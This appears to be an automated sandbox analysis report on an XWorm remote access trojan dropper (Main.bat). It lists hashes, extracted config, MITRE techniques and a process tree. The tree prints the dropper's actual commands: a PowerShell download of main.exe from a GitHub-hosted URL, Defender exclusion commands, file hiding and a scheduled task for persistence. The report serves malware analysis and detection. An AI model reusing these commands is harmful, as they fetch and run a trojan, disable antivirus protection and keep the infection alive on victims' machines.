xworm | ac74bb9370b5d6eff52190fe5767a21e6c3083e370b66506cc249a30d074f768

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
02/03/2025, 21:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Main.bat
Size

458B
MD5

7fe7990fe96629419bef8f2b22415163
SHA1

a147bd40dd7a0465bbce96282af8d3cb1a11b57d
SHA256

ac74bb9370b5d6eff52190fe5767a21e6c3083e370b66506cc249a30d074f768
SHA512

5d8d925e133e7cc33cdb154cc596c40be7e1d8e9438e640f6e3128ba50b1ad1af5ebde614edfa54d45de436168949e08b1deec0b983b7314dc407f595b709754

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

sSk9v0A6er9oWjcu

Attributes

Install_directory
%AppData%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/6EU9ps8S

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x001b00000002ae9c-34.dat	family_xworm
behavioral3/memory/2456-36-0x0000000000950000-0x0000000000978000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3628	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3628	powershell.exe
3168	powershell.exe
4552	powershell.exe
4448	powershell.exe
5076	powershell.exe
2300	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	main.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	main.exe

Executes dropped EXE 3 IoCs

pid	Process
2456	main.exe
1392	svchost.exe
1932	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	main.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
1	pastebin.com
2	raw.githubusercontent.com
4	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4528	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
3628	powershell.exe
3628	powershell.exe
2300	powershell.exe
2300	powershell.exe
3168	powershell.exe
3168	powershell.exe
4552	powershell.exe
4552	powershell.exe
4448	powershell.exe
4448	powershell.exe
5076	powershell.exe
5076	powershell.exe
2456	main.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2456	main.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	2456	main.exe
Token: SeDebugPrivilege	1392	svchost.exe
Token: SeDebugPrivilege	1932	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2456	main.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4792 wrote to memory of 3628	4792	cmd.exe	82
PID 4792 wrote to memory of 3628	4792	cmd.exe	82
PID 4792 wrote to memory of 2300	4792	cmd.exe	84
PID 4792 wrote to memory of 2300	4792	cmd.exe	84
PID 4792 wrote to memory of 1628	4792	cmd.exe	85
PID 4792 wrote to memory of 1628	4792	cmd.exe	85
PID 4792 wrote to memory of 2456	4792	cmd.exe	86
PID 4792 wrote to memory of 2456	4792	cmd.exe	86
PID 2456 wrote to memory of 3168	2456	main.exe	87
PID 2456 wrote to memory of 3168	2456	main.exe	87
PID 2456 wrote to memory of 4552	2456	main.exe	89
PID 2456 wrote to memory of 4552	2456	main.exe	89
PID 2456 wrote to memory of 4448	2456	main.exe	91
PID 2456 wrote to memory of 4448	2456	main.exe	91
PID 2456 wrote to memory of 5076	2456	main.exe	93
PID 2456 wrote to memory of 5076	2456	main.exe	93
PID 2456 wrote to memory of 4528	2456	main.exe	95
PID 2456 wrote to memory of 4528	2456	main.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1628	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Main.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://raw.githubusercontent.com/udx177/Main/refs/heads/main/main.exe -OutFile C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\main.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2300
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Views/modifies file attributes
  PID:1628
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\main.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'main.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4528

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d405540758f0f5bdaab94f1a054cc67d

SHA1
07e307420a26d17c2dc1226af6e72018da4ae26c

SHA256
2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61

SHA512
59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
df27169e333b729f1bc1eff23bd26ea0

SHA1
974ce0d487870b370bb19cacb4b05f540fe4ab16

SHA256
f3a0b32650012581b73457c11e8e4b8b15fcb3d1c538647b5712b3f4a7333489

SHA512
6d8b64468efee766faf14f4a5a93b7382fe982dc95bfa397f6d78681b7a57d20bd02b197c9fa98d0802de8c8f6b0e4525c20d73c38cfbec4732d477b765eaabc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cfe2e0ea2a211d3ff61864cdde81a36d

SHA1
71fb51d5f6511c96f3e48418d31ab09b4d2e9c85

SHA256
90b9694d435ab182adf4787da0b45f9aac320d9aa750514dd7a9b21c78186e32

SHA512
b4508d762a2213147cd1b7f467648c46da6fa7bb43fa3579cf03a1b0c2d87155d39e1fbc195c6a288053775b85dc37e4a99470fa790f1542148c3f8f0db468ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4397b0d1a82fec8a95f1ab53c152c5a5

SHA1
3632ed4f2b65fd0df29b3d3725e3a611d2e1adf7

SHA256
10cece13749ac090c815e53dc5e248b4b9c3ba93dc3d434d97d22f12a3906734

SHA512
f0d21ab75d08e1cb4ac83507f9ca41ef5365027b0d7e27747ded44b76fdb0346ca2d7499697802c5b67696e0c73716fcfab698825a143515151001690804d59f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
21017c68eaf9461301de459f4f07e888

SHA1
41ff30fc8446508d4c3407c79e798cf6eaa5bb73

SHA256
03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888

SHA512
956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zr1i4tk3.kct.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\main.exe

Filesize
137KB

MD5
57b5cb85b2b1f1a47106577864c6d0ac

SHA1
8b2c814f07c643a0e84b918c9f927fcd796409dd

SHA256
0bb30d453bca585126df4a0bd3aaa1ef8b8f7bbf6cf894f2caa6b23f2d5697b7

SHA512
f12e9763e51ae95b4a184c989953693f2bb9c3959d9d69d1164b782c54253b0df4a063b767eb818f1b32f39dfe2ef052cb0ee3d5881345fe30f320d0f857f0be

Download Submit
memory/2300-28-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/2300-27-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/2300-30-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/2300-31-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/2300-33-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/2300-18-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/2456-36-0x0000000000950000-0x0000000000978000-memory.dmp

Filesize
160KB

Download
memory/3628-0-0x00007FFD090F3000-0x00007FFD090F5000-memory.dmp

Filesize
8KB

Download
memory/3628-16-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/3628-12-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/3628-11-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/3628-10-0x00007FFD090F0000-0x00007FFD09BB2000-memory.dmp

Filesize
10.8MB

Download
memory/3628-1-0x000001DF74D00000-0x000001DF74D22000-memory.dmp

Filesize
136KB

Download